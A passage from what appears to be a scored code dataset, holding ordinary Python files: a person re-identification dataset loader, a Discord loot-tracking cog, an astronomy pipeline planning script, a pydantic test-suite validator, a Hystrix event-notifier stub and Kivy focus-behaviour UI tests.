x = self.mlp(x)
return x | 0.821403 | 0.271443 |
from __future__ import division, print_function, absolute_import
import re
import glob
import os.path as osp
import warnings
from ..dataset import ImageDataset
class MSMT17_NEW(ImageDataset):
"""MSMT17.
Reference:
Wei et al. Person Transfer GAN to Bridge Domain Gap for Person Re-Identification. CVPR 2018.
URL: `<http://www.pkuvmc.com/publications/msmt17.html>`_
Dataset statistics:
- identities: 4101.
- images: 32621 (train) + 11659 (query) + 82161 (gallery).
- cameras: 15.
"""
_junk_pids = [0, -1]
dataset_dir = 'MSMT17'
dataset_url = None
def __init__(self, root='', **kwargs):
self.root = osp.abspath(osp.expanduser(root))
self.dataset_dir = osp.join(self.root, self.dataset_dir)
self.download_dataset(self.dataset_dir, self.dataset_url)
# allow alternative directory structure
self.data_dir = self.dataset_dir
# data_dir = osp.join(self.data_dir, 'Market-1501-v15.09.15')
# if osp.isdir(data_dir):
# self.data_dir = data_dir
# else:
# warnings.warn(
# 'The current data structure is deprecated. Please '
# 'put data folders such as "bounding_box_train" under '
# '"Market-1501-v15.09.15".'
# )
self.train_dir = osp.join(self.data_dir, 'bounding_box_train')
self.query_dir = osp.join(self.data_dir, 'query')
self.gallery_dir = osp.join(self.data_dir, 'bounding_box_test')
required_files = [
self.data_dir, self.train_dir, self.query_dir, self.gallery_dir
]
train = self.process_dir(self.train_dir, relabel=True)
query = self.process_dir(self.query_dir, relabel=False)
gallery = self.process_dir(self.gallery_dir, relabel=False)
super(MSMT17_NEW, self).__init__(train, query, gallery, **kwargs)
def process_dir(self, dir_path, relabel=False):
img_paths = glob.glob(osp.join(dir_path, '*.jpg'))
pattern = re.compile(r'([-\d]+)_c(\d+)')
pid_container = set()
for img_path in img_paths:
pid, _ = map(int, pattern.search(img_path).groups())
if pid == -1:
continue # junk images are just ignored
pid_container.add(pid)
pid2label = {pid: label for label, pid in enumerate(pid_container)}
data = []
for img_path in img_paths:
pid, camid = map(int, pattern.search(img_path).groups())
if pid == -1:
continue # junk images are just ignored
assert 0 <= pid <= 3059 # pid == 0 means background
assert 1 <= camid <= 15
camid -= 1 # index starts from 0
if relabel:
pid = pid2label[pid]
data.append((img_path, pid, camid))
return data | torchreid/data/datasets/image/msmt17_new.py | from __future__ import division, print_function, absolute_import
import re
import glob
import os.path as osp
import warnings
from ..dataset import ImageDataset
class MSMT17_NEW(ImageDataset):
"""MSMT17.
Reference:
Wei et al. Person Transfer GAN to Bridge Domain Gap for Person Re-Identification. CVPR 2018.
URL: `<http://www.pkuvmc.com/publications/msmt17.html>`_
Dataset statistics:
- identities: 4101.
- images: 32621 (train) + 11659 (query) + 82161 (gallery).
- cameras: 15.
"""
_junk_pids = [0, -1]
dataset_dir = 'MSMT17'
dataset_url = None
def __init__(self, root='', **kwargs):
self.root = osp.abspath(osp.expanduser(root))
self.dataset_dir = osp.join(self.root, self.dataset_dir)
self.download_dataset(self.dataset_dir, self.dataset_url)
# allow alternative directory structure
self.data_dir = self.dataset_dir
# data_dir = osp.join(self.data_dir, 'Market-1501-v15.09.15')
# if osp.isdir(data_dir):
# self.data_dir = data_dir
# else:
# warnings.warn(
# 'The current data structure is deprecated. Please '
# 'put data folders such as "bounding_box_train" under '
# '"Market-1501-v15.09.15".'
# )
self.train_dir = osp.join(self.data_dir, 'bounding_box_train')
self.query_dir = osp.join(self.data_dir, 'query')
self.gallery_dir = osp.join(self.data_dir, 'bounding_box_test')
required_files = [
self.data_dir, self.train_dir, self.query_dir, self.gallery_dir
]
train = self.process_dir(self.train_dir, relabel=True)
query = self.process_dir(self.query_dir, relabel=False)
gallery = self.process_dir(self.gallery_dir, relabel=False)
super(MSMT17_NEW, self).__init__(train, query, gallery, **kwargs)
def process_dir(self, dir_path, relabel=False):
img_paths = glob.glob(osp.join(dir_path, '*.jpg'))
pattern = re.compile(r'([-\d]+)_c(\d+)')
pid_container = set()
for img_path in img_paths:
pid, _ = map(int, pattern.search(img_path).groups())
if pid == -1:
continue # junk images are just ignored
pid_container.add(pid)
pid2label = {pid: label for label, pid in enumerate(pid_container)}
data = []
for img_path in img_paths:
pid, camid = map(int, pattern.search(img_path).groups())
if pid == -1:
continue # junk images are just ignored
assert 0 <= pid <= 3059 # pid == 0 means background
assert 1 <= camid <= 15
camid -= 1 # index starts from 0
if relabel:
pid = pid2label[pid]
data.append((img_path, pid, camid))
return data | 0.531453 | 0.21463 |
import discord
from redbot.core import Config, commands
from redbot.core.bot import Red
BaseCog = getattr(commands, "Cog", object)
class Loot(BaseCog):
default_guild_settings = {}
def __init__(self, bot: Red):
self.bot = bot
self._loot = Config.get_conf(self, 9741981201)
self._loot.register_guild(**self.default_guild_settings)
@commands.group(pass_context=True)
async def loot(self, ctx):
"""Loot related commands"""
if ctx.invoked_subcommand is None:
await ctx.send_help()
@loot.command(pass_context=True)
async def add(self, ctx, name: str, char: str, price: int):
"""Adds players and amounts paid to an item"""
name = name.lower()
guild = ctx.guild
loot = await self._loot.guild(guild).all()
if name not in loot:
await ctx.send("item doesn't exist, please use [p]loot create first")
return
loot[name][char] = price
await ctx.send("{} paid {} for {}".format(char, price, name))
await self._loot.guild(guild).set(loot)
@loot.command(pass_context=True)
async def create(self, ctx, name: str):
"""Creates an item in the current guild."""
name = name.lower()
guild = ctx.guild
loot = await self._loot.guild(guild).all()
if name in loot.keys():
await ctx.send("Item already exists, use another name.")
return
loot[name] = {}
await ctx.send("{} has been added.".format(name))
await self._loot.guild(guild).set(loot)
@loot.command(pass_context=True)
async def info(self, ctx, name: str):
"""Shows who has invested in the item"""
name = name.lower()
guild = ctx.guild
loot = await self._loot.guild(guild).all()
if name not in loot.keys():
await ctx.send(
"Please make sure that the name is spelled correctly and "
"that you can find it in [p]loot list"
)
return
players = "\n".join(list(loot[name].keys()))
gold = "\n".join(str(x) for x in list(loot[name].values()))
embed = discord.Embed(color=6465603)
embed.set_author(name=name)
embed.add_field(name="__Players__", value=players)
embed.add_field(name="__Price Paid__", value=gold)
await ctx.send(embed=embed)
@loot.command(pass_context=True)
async def list(self, ctx):
"""Shows existing loot in the current guild"""
guild = ctx.guild
loot = await self._loot.guild(guild).all()
if len(loot) < 1:
await ctx.send(
"No items have been created for this guild yet, please create some using [p]item create"
" first, thanks"
)
return
items = loot.keys()
await ctx.send("Here are this guild's items:\n{}".format("\n".join(items)))
@loot.command(pass_context=True, hidden=True)
async def remove(self, ctx, name: str, char: str = None):
"""Deletes existing characters in an item or items"""
name = name.lower()
guild = ctx.guild
loot = await self._loot.guild(guild).all()
if name not in loot.keys():
await ctx.send(
"Please make sure that the name is spelled correctly and "
"that you can find it in [p]loot list"
)
return
if char is None:
del loot[name]
elif char in loot[name]:
del loot[name][char]
await ctx.send("{} has been removed".format(char if char else name))
await self._loot.guild(guild).set(loot) | loot/loot.py | import discord
from redbot.core import Config, commands
from redbot.core.bot import Red
BaseCog = getattr(commands, "Cog", object)
class Loot(BaseCog):
default_guild_settings = {}
def __init__(self, bot: Red):
self.bot = bot
self._loot = Config.get_conf(self, 9741981201)
self._loot.register_guild(**self.default_guild_settings)
@commands.group(pass_context=True)
async def loot(self, ctx):
"""Loot related commands"""
if ctx.invoked_subcommand is None:
await ctx.send_help()
@loot.command(pass_context=True)
async def add(self, ctx, name: str, char: str, price: int):
"""Adds players and amounts paid to an item"""
name = name.lower()
guild = ctx.guild
loot = await self._loot.guild(guild).all()
if name not in loot:
await ctx.send("item doesn't exist, please use [p]loot create first")
return
loot[name][char] = price
await ctx.send("{} paid {} for {}".format(char, price, name))
await self._loot.guild(guild).set(loot)
@loot.command(pass_context=True)
async def create(self, ctx, name: str):
"""Creates an item in the current guild."""
name = name.lower()
guild = ctx.guild
loot = await self._loot.guild(guild).all()
if name in loot.keys():
await ctx.send("Item already exists, use another name.")
return
loot[name] = {}
await ctx.send("{} has been added.".format(name))
await self._loot.guild(guild).set(loot)
@loot.command(pass_context=True)
async def info(self, ctx, name: str):
"""Shows who has invested in the item"""
name = name.lower()
guild = ctx.guild
loot = await self._loot.guild(guild).all()
if name not in loot.keys():
await ctx.send(
"Please make sure that the name is spelled correctly and "
"that you can find it in [p]loot list"
)
return
players = "\n".join(list(loot[name].keys()))
gold = "\n".join(str(x) for x in list(loot[name].values()))
embed = discord.Embed(color=6465603)
embed.set_author(name=name)
embed.add_field(name="__Players__", value=players)
embed.add_field(name="__Price Paid__", value=gold)
await ctx.send(embed=embed)
@loot.command(pass_context=True)
async def list(self, ctx):
"""Shows existing loot in the current guild"""
guild = ctx.guild
loot = await self._loot.guild(guild).all()
if len(loot) < 1:
await ctx.send(
"No items have been created for this guild yet, please create some using [p]item create"
" first, thanks"
)
return
items = loot.keys()
await ctx.send("Here are this guild's items:\n{}".format("\n".join(items)))
@loot.command(pass_context=True, hidden=True)
async def remove(self, ctx, name: str, char: str = None):
"""Deletes existing characters in an item or items"""
name = name.lower()
guild = ctx.guild
loot = await self._loot.guild(guild).all()
if name not in loot.keys():
await ctx.send(
"Please make sure that the name is spelled correctly and "
"that you can find it in [p]loot list"
)
return
if char is None:
del loot[name]
elif char in loot[name]:
del loot[name][char]
await ctx.send("{} has been removed".format(char if char else name))
await self._loot.guild(guild).set(loot) | 0.364099 | 0.145267 |
from __future__ import division
from __future__ import print_function
from __future__ import absolute_import
from __future__ import unicode_literals
import argparse
import glob
import numpy as np
import os
import sys
import subprocess
import pdb
from apogee.plan import mkslurm
if __name__ == '__main__' :
parser = argparse.ArgumentParser(
prog=os.path.basename(sys.argv[0]),
description='Creates ASPCAP directories and plan files')
parser.add_argument("apred",type=str, help='apred version')
parser.add_argument("aspcap",type=str,help='aspcap version')
parser.add_argument("config",type=str,help='aspcap configuration')
parser.add_argument("--apstar",type=str, help='apred version',default='stars')
parser.add_argument("--queue",type=int,default=0)
parser.add_argument("--ncpus",type=int,default=16)
parser.add_argument("--noplot",type=int,default=0)
parser.add_argument("--noelem",type=int,default=0)
parser.add_argument("--nstars",type=int,default=0)
parser.add_argument("--commiss",type=int,default=0)
parser.add_argument("--nored",type=int,default=0)
parser.add_argument("--visits",type=int,default=0)
parser.add_argument("--caldir",type=str,default='0')
parser.add_argument("--npar",type=int,default=0)
parser.add_argument("--renorm",type=int,default=0)
parser.add_argument("--maxwind",type=int,default=0)
parser.add_argument("--unitweight",type=int,default=0)
parser.add_argument("--minmjdlast",type=int,default=0)
parser.add_argument("--fields",type=str,nargs='+',help='list of fields',default=[])
args=parser.parse_args()
if len(args.fields) > 0 : nstars=np.zeros(len(args.fields),dtype=int)
for i,field in enumerate(args.fields) :
print('field: ', field)
cmd=["idl","-e","aspcap_mkplan,'"+field+"'"+
",apred_vers='{:s}'".format(args.apred)+
",apstar_vers='{:s}'".format(args.apstar)+
",aspcap_vers='{:s}'".format(args.aspcap)+
",aspcap_config='{:s}'".format(args.config)+
",ncpus={:d}".format(args.ncpus)+
",queue={:d}".format(args.queue)+
",noplot={:d}".format(args.noplot)+
",caldir='{:s}'".format(args.caldir)+
",noelem={:d}".format(args.noelem)+
",nstars={:d}".format(args.nstars)+
",commiss={:d}".format(args.commiss)+
",nored={:d}".format(args.nored)+
",visits={:d}".format(args.visits)+
",npar={:d}".format(args.npar)+
",minmjdlast={:d}".format(args.minmjdlast)+
",renorm={:d}".format(args.renorm)+
",maxwind={:d}".format(args.maxwind)]
print(cmd)
subprocess.call(cmd,shell=False)
nstars[i] = len(glob.glob(field+'/a?Star-*.fits'))
for inst in ['apogee-n','apogee-s'] :
outdir=os.environ['APOGEE_ASPCAP']+'/'+args.apred+'/'+args.aspcap+'/config/'+inst+'/'
cmd=["idl","-e","aspcap_mklib,'"+args.config+"'"+
",outdir='{:s}'".format(outdir)+
",apred='{:s}'".format(args.apred)+
",renorm={:d}".format(args.renorm)+
",maxwind={:d}".format(args.maxwind)+
",unitweight={:d}".format(args.unitweight)+
",inst='"+inst+"'"]
print(cmd)
subprocess.call(cmd,shell=False)
f=open(outdir+'/done','w')
f.close()
topdir=os.environ['APOGEE_ASPCAP']+'/'+args.apred+'/'+args.aspcap
os.chdir(topdir)
cmd='aspcap '
if args.noelem != 0 : cmd+=' --noelem'
mkslurm.write('"'+cmd+'" apo*/plan/aspcapStar*.par lco*/plan/aspcapStar*.par',maxrun=2,idlthreads=16,queryport=1051,queryhost=os.uname()[1])
sort=np.argsort(nstars)[::-1]
fp=open(topdir+'/slurm/fields.sort','w')
for i in range(len(sort)) :
tel=args.fields[sort[i]].split('/')[0]
field=args.fields[sort[i]].split('/')[1]
fp.write('{:s}/plan/aspcapStar-{:s}.par {:d}\n'.format(tel,field,nstars[sort[i]]))
fp.close()
print('Modify slurm/aspcap to use fields.sort if desired...') | bin/mkaspcap.py |
from __future__ import division
from __future__ import print_function
from __future__ import absolute_import
from __future__ import unicode_literals
import argparse
import glob
import numpy as np
import os
import sys
import subprocess
import pdb
from apogee.plan import mkslurm
if __name__ == '__main__' :
parser = argparse.ArgumentParser(
prog=os.path.basename(sys.argv[0]),
description='Creates ASPCAP directories and plan files')
parser.add_argument("apred",type=str, help='apred version')
parser.add_argument("aspcap",type=str,help='aspcap version')
parser.add_argument("config",type=str,help='aspcap configuration')
parser.add_argument("--apstar",type=str, help='apred version',default='stars')
parser.add_argument("--queue",type=int,default=0)
parser.add_argument("--ncpus",type=int,default=16)
parser.add_argument("--noplot",type=int,default=0)
parser.add_argument("--noelem",type=int,default=0)
parser.add_argument("--nstars",type=int,default=0)
parser.add_argument("--commiss",type=int,default=0)
parser.add_argument("--nored",type=int,default=0)
parser.add_argument("--visits",type=int,default=0)
parser.add_argument("--caldir",type=str,default='0')
parser.add_argument("--npar",type=int,default=0)
parser.add_argument("--renorm",type=int,default=0)
parser.add_argument("--maxwind",type=int,default=0)
parser.add_argument("--unitweight",type=int,default=0)
parser.add_argument("--minmjdlast",type=int,default=0)
parser.add_argument("--fields",type=str,nargs='+',help='list of fields',default=[])
args=parser.parse_args()
if len(args.fields) > 0 : nstars=np.zeros(len(args.fields),dtype=int)
for i,field in enumerate(args.fields) :
print('field: ', field)
cmd=["idl","-e","aspcap_mkplan,'"+field+"'"+
",apred_vers='{:s}'".format(args.apred)+
",apstar_vers='{:s}'".format(args.apstar)+
",aspcap_vers='{:s}'".format(args.aspcap)+
",aspcap_config='{:s}'".format(args.config)+
",ncpus={:d}".format(args.ncpus)+
",queue={:d}".format(args.queue)+
",noplot={:d}".format(args.noplot)+
",caldir='{:s}'".format(args.caldir)+
",noelem={:d}".format(args.noelem)+
",nstars={:d}".format(args.nstars)+
",commiss={:d}".format(args.commiss)+
",nored={:d}".format(args.nored)+
",visits={:d}".format(args.visits)+
",npar={:d}".format(args.npar)+
",minmjdlast={:d}".format(args.minmjdlast)+
",renorm={:d}".format(args.renorm)+
",maxwind={:d}".format(args.maxwind)]
print(cmd)
subprocess.call(cmd,shell=False)
nstars[i] = len(glob.glob(field+'/a?Star-*.fits'))
for inst in ['apogee-n','apogee-s'] :
outdir=os.environ['APOGEE_ASPCAP']+'/'+args.apred+'/'+args.aspcap+'/config/'+inst+'/'
cmd=["idl","-e","aspcap_mklib,'"+args.config+"'"+
",outdir='{:s}'".format(outdir)+
",apred='{:s}'".format(args.apred)+
",renorm={:d}".format(args.renorm)+
",maxwind={:d}".format(args.maxwind)+
",unitweight={:d}".format(args.unitweight)+
",inst='"+inst+"'"]
print(cmd)
subprocess.call(cmd,shell=False)
f=open(outdir+'/done','w')
f.close()
topdir=os.environ['APOGEE_ASPCAP']+'/'+args.apred+'/'+args.aspcap
os.chdir(topdir)
cmd='aspcap '
if args.noelem != 0 : cmd+=' --noelem'
mkslurm.write('"'+cmd+'" apo*/plan/aspcapStar*.par lco*/plan/aspcapStar*.par',maxrun=2,idlthreads=16,queryport=1051,queryhost=os.uname()[1])
sort=np.argsort(nstars)[::-1]
fp=open(topdir+'/slurm/fields.sort','w')
for i in range(len(sort)) :
tel=args.fields[sort[i]].split('/')[0]
field=args.fields[sort[i]].split('/')[1]
fp.write('{:s}/plan/aspcapStar-{:s}.par {:d}\n'.format(tel,field,nstars[sort[i]]))
fp.close()
print('Modify slurm/aspcap to use fields.sort if desired...') | 0.310799 | 0.049681 |
"""ETOS API suite validator module."""
import logging
from uuid import UUID
from typing import Union, List
from pydantic import BaseModel, validator, ValidationError, constr, conlist
import requests
class Environment(BaseModel):
"""ETOS suite definion 'ENVIRONMENT' constraint."""
key: str
value: dict
class Command(BaseModel):
"""ETOS suite definion 'COMMAND' constraint."""
key: str
value: constr(min_length=1)
class Checkout(BaseModel):
"""ETOS suite definion 'CHECKOUT' constraint."""
key: str
value: conlist(str, min_items=1)
class Parameters(BaseModel):
"""ETOS suite definion 'PARAMETERS' constraint."""
key: str
value: dict
class Execute(BaseModel):
"""ETOS suite definion 'EXECUTE' constraint."""
key: str
value: List[str]
class TestRunner(BaseModel):
"""ETOS suite definion 'TEST_RUNNER' constraint."""
key: str
value: constr(min_length=1)
class TestCase(BaseModel):
"""ETOS suite definion 'testCase' field."""
id: str
tracker: str
url: str
class Constraint(BaseModel):
"""ETOS suite definion 'constraints' field."""
key: str
value: Union[str, list, dict] # pylint:disable=unsubscriptable-object
class Recipe(BaseModel):
"""ETOS suite definion 'recipes' field."""
constraints: List[Constraint]
id: UUID
testCase: TestCase
__constraint_models = {
"ENVIRONMENT": Environment,
"COMMAND": Command,
"CHECKOUT": Checkout,
"PARAMETERS": Parameters,
"EXECUTE": Execute,
"TEST_RUNNER": TestRunner,
}
@validator("constraints")
def validate_constraints(
cls, value
): # Pydantic requires cls. pylint:disable=no-self-argument
"""Validate the constraints fields for each recipe.
Validation is done manually because error messages from pydantic
are not clear enough when using a Union check on the models.
Pydantic does not check the number of unions either, which is something
that is required for ETOS.
:raises ValueError: if there are too many or too few constraints.
:raises TypeError: If an unknown constraint is detected.
:raises ValidationError: If constraint model does not validate.
:param value: The current constraint that is being validated.
:type value: Any
:return: Same as value, if validated.
:rtype: Any
"""
count = dict.fromkeys(cls.__constraint_models.keys(), 0)
for constraint in value:
model = cls.__constraint_models.get(constraint.key)
if model is None:
raise TypeError(
"Unknown key %r, valid keys: %r"
% (constraint.key, tuple(cls.__constraint_models.keys()))
)
try:
model(**constraint.dict())
except ValidationError as exception:
raise ValueError(str(exception)) from exception
count[constraint.key] += 1
more_than_one = [key for key, number in count.items() if number > 1]
if more_than_one:
raise ValueError(
"Too many instances of keys %r. Only 1 allowed." % more_than_one
)
missing = [key for key, number in count.items() if number == 0]
if missing:
raise ValueError(
"Too few instances of keys %r. At least 1 required." % missing
)
return value
class Suite(BaseModel):
"""ETOS base suite definition."""
name: str
priority: int
recipes: List[Recipe]
class SuiteValidator: # pylint:disable=too-few-public-methods
"""Validate ETOS suite definitions to make sure they are executable."""
logger = logging.getLogger(__name__)
async def _download_suite(self, test_suite_url):
"""Attempt to download suite.
:param test_suite_url: URL to test suite to download.
:type test_suite_url: str
:return: Downloaded test suite as JSON.
:rtype: list
"""
try:
suite = requests.get(test_suite_url)
suite.raise_for_status()
except Exception as exception: # pylint:disable=broad-except
raise AssertionError(
"Unable to download suite from %r" % test_suite_url
) from exception
return suite.json()
async def validate(self, test_suite_url):
"""Validate the ETOS suite definition.
:param test_suite_url: URL to test suite that is being executed.
:type test_suite_url: str
:raises ValidationError: If the suite did not validate.
"""
downloaded_suite = await self._download_suite(test_suite_url)
for suite in downloaded_suite:
assert Suite(**suite) | src/etos_api/library/validator.py | """ETOS API suite validator module."""
import logging
from uuid import UUID
from typing import Union, List
from pydantic import BaseModel, validator, ValidationError, constr, conlist
import requests
class Environment(BaseModel):
"""ETOS suite definion 'ENVIRONMENT' constraint."""
key: str
value: dict
class Command(BaseModel):
"""ETOS suite definion 'COMMAND' constraint."""
key: str
value: constr(min_length=1)
class Checkout(BaseModel):
"""ETOS suite definion 'CHECKOUT' constraint."""
key: str
value: conlist(str, min_items=1)
class Parameters(BaseModel):
"""ETOS suite definion 'PARAMETERS' constraint."""
key: str
value: dict
class Execute(BaseModel):
"""ETOS suite definion 'EXECUTE' constraint."""
key: str
value: List[str]
class TestRunner(BaseModel):
"""ETOS suite definion 'TEST_RUNNER' constraint."""
key: str
value: constr(min_length=1)
class TestCase(BaseModel):
"""ETOS suite definion 'testCase' field."""
id: str
tracker: str
url: str
class Constraint(BaseModel):
"""ETOS suite definion 'constraints' field."""
key: str
value: Union[str, list, dict] # pylint:disable=unsubscriptable-object
class Recipe(BaseModel):
"""ETOS suite definion 'recipes' field."""
constraints: List[Constraint]
id: UUID
testCase: TestCase
__constraint_models = {
"ENVIRONMENT": Environment,
"COMMAND": Command,
"CHECKOUT": Checkout,
"PARAMETERS": Parameters,
"EXECUTE": Execute,
"TEST_RUNNER": TestRunner,
}
@validator("constraints")
def validate_constraints(
cls, value
): # Pydantic requires cls. pylint:disable=no-self-argument
"""Validate the constraints fields for each recipe.
Validation is done manually because error messages from pydantic
are not clear enough when using a Union check on the models.
Pydantic does not check the number of unions either, which is something
that is required for ETOS.
:raises ValueError: if there are too many or too few constraints.
:raises TypeError: If an unknown constraint is detected.
:raises ValidationError: If constraint model does not validate.
:param value: The current constraint that is being validated.
:type value: Any
:return: Same as value, if validated.
:rtype: Any
"""
count = dict.fromkeys(cls.__constraint_models.keys(), 0)
for constraint in value:
model = cls.__constraint_models.get(constraint.key)
if model is None:
raise TypeError(
"Unknown key %r, valid keys: %r"
% (constraint.key, tuple(cls.__constraint_models.keys()))
)
try:
model(**constraint.dict())
except ValidationError as exception:
raise ValueError(str(exception)) from exception
count[constraint.key] += 1
more_than_one = [key for key, number in count.items() if number > 1]
if more_than_one:
raise ValueError(
"Too many instances of keys %r. Only 1 allowed." % more_than_one
)
missing = [key for key, number in count.items() if number == 0]
if missing:
raise ValueError(
"Too few instances of keys %r. At least 1 required." % missing
)
return value
class Suite(BaseModel):
"""ETOS base suite definition."""
name: str
priority: int
recipes: List[Recipe]
class SuiteValidator: # pylint:disable=too-few-public-methods
"""Validate ETOS suite definitions to make sure they are executable."""
logger = logging.getLogger(__name__)
async def _download_suite(self, test_suite_url):
"""Attempt to download suite.
:param test_suite_url: URL to test suite to download.
:type test_suite_url: str
:return: Downloaded test suite as JSON.
:rtype: list
"""
try:
suite = requests.get(test_suite_url)
suite.raise_for_status()
except Exception as exception: # pylint:disable=broad-except
raise AssertionError(
"Unable to download suite from %r" % test_suite_url
) from exception
return suite.json()
async def validate(self, test_suite_url):
"""Validate the ETOS suite definition.
:param test_suite_url: URL to test suite that is being executed.
:type test_suite_url: str
:raises ValidationError: If the suite did not validate.
"""
downloaded_suite = await self._download_suite(test_suite_url)
for suite in downloaded_suite:
assert Suite(**suite) | 0.925048 | 0.310917 |
from __future__ import absolute_import
import logging
log = logging.getLogger(__name__)
class AbstractBaseEventNotifier(object):
""" Abstract base EventNotifier that allows receiving notifications for
different events with default implementations.
See :class:`hystrix.strategy.plugins.Plugin` or the Hystrix GitHub Wiki
for information on `configuring plugins
<https://github.com/Netflix/Hystrix/wiki/Plugins>`_.
.. note::
Note on thread-safety and performance
A single implementation of this class will be used globally so methods
on this class will be invoked concurrently from multiple threads so
all functionality must be thread-safe.
Methods are also invoked synchronously and will add to execution time
of the commands so all behavior should be fast. If anything
time-consuming is to be done it should be spawned asynchronously
onto separate worker threads.
"""
def mark_event(self, event_type, command_name):
""" Called for every event fired.
This is the default Implementation and does nothing
Args:
event_type: A :class:hystrix.event_type.EventType` occurred
during execution.
command_key: Command instance name.
"""
# Do nothing
pass
def mark_command_execution(self, command_name, isolation_strategy, duration, events_type):
""" Called after a command is executed using thread isolation.
Will not get called if a command is rejected, short-circuited etc.
This is the default Implementation and does nothing
Args:
command_key: Command instance name.
isolation_strategy: :class:`ExecutionIsolationStrategy` the
isolation strategy used by the command when executed
duration: Time in milliseconds of executing
:meth:`hystrix.command.Command.run()` method.
events_type: A list of :class:hystrix.event_type.EventType` of events
occurred during execution.
"""
# Do nothing
pass | hystrix/strategy/eventnotifier/event_notifier.py | from __future__ import absolute_import
import logging
log = logging.getLogger(__name__)
class AbstractBaseEventNotifier(object):
""" Abstract base EventNotifier that allows receiving notifications for
different events with default implementations.
See :class:`hystrix.strategy.plugins.Plugin` or the Hystrix GitHub Wiki
for information on `configuring plugins
<https://github.com/Netflix/Hystrix/wiki/Plugins>`_.
.. note::
Note on thread-safety and performance
A single implementation of this class will be used globally so methods
on this class will be invoked concurrently from multiple threads so
all functionality must be thread-safe.
Methods are also invoked synchronously and will add to execution time
of the commands so all behavior should be fast. If anything
time-consuming is to be done it should be spawned asynchronously
onto separate worker threads.
"""
def mark_event(self, event_type, command_name):
""" Called for every event fired.
This is the default Implementation and does nothing
Args:
event_type: A :class:hystrix.event_type.EventType` occurred
during execution.
command_key: Command instance name.
"""
# Do nothing
pass
def mark_command_execution(self, command_name, isolation_strategy, duration, events_type):
""" Called after a command is executed using thread isolation.
Will not get called if a command is rejected, short-circuited etc.
This is the default Implementation and does nothing
Args:
command_key: Command instance name.
isolation_strategy: :class:`ExecutionIsolationStrategy` the
isolation strategy used by the command when executed
duration: Time in milliseconds of executing
:meth:`hystrix.command.Command.run()` method.
events_type: A list of :class:hystrix.event_type.EventType` of events
occurred during execution.
"""
# Do nothing
pass | 0.897819 | 0.161585 |
import kivy
kivy.require('1.11.1')
from kivy.app import App
from kivy.clock import Clock
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.label import Label
from kivy.uix.scrollview import ScrollView
from kivy.uix.textinput import TextInput
from kivy.uix.tabbedpanel import TabbedPanelItem
from kivy.uix.treeview import TreeViewLabel
import pytest
from math import isclose
from common import run_in_app
from kivy_garden.advancedfocusbehavior import *
def default_container():
return FocusBoxLayout(orientation='vertical', padding=30, spacing=30)
class CheckActionApp(App):
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.did_action = False
def stop(self):
super().stop()
assert self.did_action
class CheckFocusActionApp(FocusApp):
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.did_action = False
def stop(self):
super().stop()
assert self.did_action
# TODO: move to different file
@run_in_app(app_class=CheckActionApp)
def test_focus_buttons():
app = App.get_running_app()
self = test_focus_buttons
def push_me(*args):
app.did_action = True
app.stop()
container = FocusBoxLayout()
btn = FocusButton(text='Press Enter', on_press=push_me)
container.add_widget(btn)
app.root.add_widget(container)
assert btn.focus
return True
@run_in_app(app_class=CheckActionApp)
def test_cycle_through_focusables():
app = App.get_running_app()
app.step_1 = False
def focus_1(btn, state):
if not state:
return
if app.step_1:
app.did_action = True
app.stop()
def focus_2(btn, state):
if not state:
return
if app.step_1:
app.stop()
else:
app.step_1 = True
def focus_3(btn, state):
if not state:
return
app.stop()
container = default_container()
container.add_widget(Label(text=('Press Tab once to cycle to the next widget, '
'then press Shift+Tab once to cycle back.')))
first = FocusButton(text='button 1')
second = FocusButton(text='button 2')
third = FocusButton(text='button 3')
first.bind(focus=focus_1)
second.bind(focus=focus_2)
third.bind(focus=focus_3)
for btn in (first, second, third):
container.add_widget(btn)
app.root.add_widget(container)
assert first.focus
return True
@run_in_app(app_class=CheckFocusActionApp, timeout=15)
def test_focus_from_nothing():
app = App.get_running_app()
instructions = Label(text='Press any button')
container = default_container()
container.add_widget(instructions)
def press(*args):
app.did_action = True
app.stop()
for _ in range(5):
btn = FocusButton(text='Press me', on_press=press)
container.add_widget(btn)
for widg in container.children:
if hasattr(widg, 'focus'):
widg.focus = False
app.root.add_widget(container)
return True
@run_in_app(app_class=CheckActionApp, timeout=20)
def test_carousel():
app = App.get_running_app()
app.step_1 = False
def press_1(*args):
app.step_1 = True
def press_2(*args):
if app.step_1:
app.did_action = True
app.stop()
car = FocusCarousel(direction='right')
car.add_widget(Label(text='Navigate to the right in the carousel'))
container = default_container()
btn_1 = FocusButton(text='Press me')
btn_2 = FocusButton(text='Press me after you\'ve pressed the other button')
btn_1.bind(on_press=press_1)
btn_2.bind(on_press=press_2)
container.add_widget(btn_1)
car.add_widget(container)
app.root.add_widget(car)
app.root.add_widget(btn_2)
return True
@run_in_app(app_class=CheckActionApp)
def test_checkbox():
app = App.get_running_app()
container = default_container()
lb = Label(text='Activate the checkbox, then press the button below it.')
cb = FocusCheckBox()
btn = FocusButton(text='Test checkbox')
def press_me(*args):
assert cb.active
app.did_action = True
app.stop()
btn.bind(on_press=press_me)
for widg in (lb, cb, btn):
container.add_widget(widg)
app.root.add_widget(container)
return True
@run_in_app(app_class=CheckActionApp)
def test_toggle_button():
app = App.get_running_app()
container = default_container()
lb = Label(text='Activate the toggle button, then press the button below it.')
tb = FocusToggleButton(text='off')
btn = FocusButton(text='Test toggle button')
def update_toggle_label(tbtn, val):
tbtn.text = 'on' if val == 'down' else 'off'
def press_me(*args):
assert tb.state == 'down'
app.did_action = True
app.stop()
tb.bind(state=update_toggle_label)
btn.bind(on_press=press_me)
for widg in (lb, tb, btn):
container.add_widget(widg)
app.root.add_widget(container)
return True
@run_in_app(app_class=CheckActionApp)
def test_slider():
value = 48
app = App.get_running_app()
container = default_container()
instruction_label = Label(text=f'Set the slider to {value}')
pos_label = Label()
slider = FocusSlider()
btn = FocusButton(text='Submit')
def update_pos_label(slider, value):
pos_label.text = str(int(value))
def press_me(*args):
assert int(slider.value) == value
app.did_action = True
app.stop()
slider.bind(value=update_pos_label)
btn.bind(on_press=press_me)
for widg in (instruction_label, pos_label, slider, btn):
container.add_widget(widg)
app.root.add_widget(container)
return True
@run_in_app(app_class=CheckActionApp)
def test_screen_manager():
app = App.get_running_app()
app.step_1 = False
instructions = Label(text=('Press the button on the next screen, then press'
' the button at the bottom of the app.'))
s1 = FocusScreen(name='screen_1')
container_1 = default_container()
to_screen_2 = FocusButton(text='To screen 2 ->')
container_1.add_widget(to_screen_2)
s1.add_widget(container_1)
s2 = FocusScreen(name='screen_2')
container_2 = default_container()
